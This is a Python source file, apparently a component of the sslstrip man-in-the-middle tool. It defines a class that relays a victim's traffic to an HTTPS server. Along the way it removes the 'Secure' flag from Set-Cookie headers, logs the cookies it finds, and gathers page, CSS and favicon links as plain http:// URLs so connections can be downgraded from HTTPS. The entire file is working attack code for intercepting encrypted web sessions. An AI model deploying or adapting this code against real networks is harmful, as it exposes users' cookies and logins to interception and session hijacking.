# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#

from SSLShuffleSocket import SSLShuffleSocket
from DataShuffler import DataShuffler

import re, string
import logging

class SSLDataShuffler(DataShuffler):

    '''This class shuffles data back and forth across a client, server socket pair,
    where the server side is an SSL connection.  As it moves the data, it watches out for:

    1) Cookies with secure bits.
    2) Absolute https links.
    3) Relative links.
    3) Favicon statements.

    '''

    def __init__(self, clientSocket, serverHost, secureLinkListener):
        self.serverHost   = serverHost
        self.serverSocket = SSLShuffleSocket(serverHost)

        self.cookieExpression   = re.compile(r"Set-Cookie:([ \w\d:#@%/;$()~_?\+-=\\\.&]+); ?Secure\r\n")
        self.cssExpression      = re.compile(r"url\(([\w\d:#@%/;$~_?\+-=\\\.&]+)\)")
        self.iconExpression     = re.compile(r"<link rel=\"shortcut icon\" .*href=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>")
        self.linkExpression     = re.compile(r"<((a)|(link)|(img)|(script)) .*((href)|(src))=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>")

        DataShuffler.initialize(self, clientSocket, secureLinkListener)

    def getPostPrefix(self):
        return "SECURE POST"

    def getRequestLogLevel(self):
        return logging.INFO

    def getHeaderLogLevel(self):
        return logging.INFO

    def checkForAbortiveCase(self, data):
        return False

    def sendRequest(self, command, path, headers):
        logging.log(DataShuffler.getRequestLogLevel(self), "Sending Secure Request")
        DataShuffler.sendRequest(self, command, path, headers)

    def replaceSecureCookies(self, data):
        iterator         = re.finditer(self.cookieExpression, data, re.IGNORECASE)

        for match in iterator:
            cookie = match.group(1)
            logging.debug("Found secure cookie: " + cookie)

        return self.cookieExpression.sub("Set-Cookie:\g<1>\r\n", data, re.IGNORECASE)

    def replaceCssLinks(self, data):
        iterator      = re.finditer(self.cssExpression, data, re.IGNORECASE)

        for match in iterator:
            link = match.group(1)

            if not link.startswith('http'):
                logging.debug("Found relative link in secure CSS transmission: " + link)

                absoluteLink = "http://"+self.serverHost+link
                absoluteLink = absoluteLink.replace('&amp;', '&')
                self.secureLinkListener.addLink(absoluteLink)

        return data

    def replaceSecureFavicon(self, data):
        iterator = re.finditer(self.iconExpression, data, re.IGNORECASE)
        
        for match in iterator:
            link = match.group(1)
            link.replace('http://', 'https://')

            if not link.startswith('http://'):
                link = 'http://' + self.serverHost + link

            self.secureLinkListener.addSecureFavicon(link)
            self.secureLinkListener.addLink(link)
            
        return data
            
    def replaceSecureLinks(self, data):
        data           = DataShuffler.replaceSecureLinks(self, data)
        data           = self.replaceSecureCookies(data)
        data           = self.replaceCssLinks(data)
        data           = self.replaceSecureFavicon(data)
        iterator       = re.finditer(self.linkExpression, data, re.IGNORECASE)

        for match in iterator:
            link = match.group(9)

            if not link.startswith('http'):
                logging.debug("Found relative link in secure transmission: " + link)

                absoluteLink = "http://"+self.serverHost+link
                absoluteLink = absoluteLink.replace('&amp;', '&')
                self.secureLinkListener.addLink(absoluteLink);
        
        return data
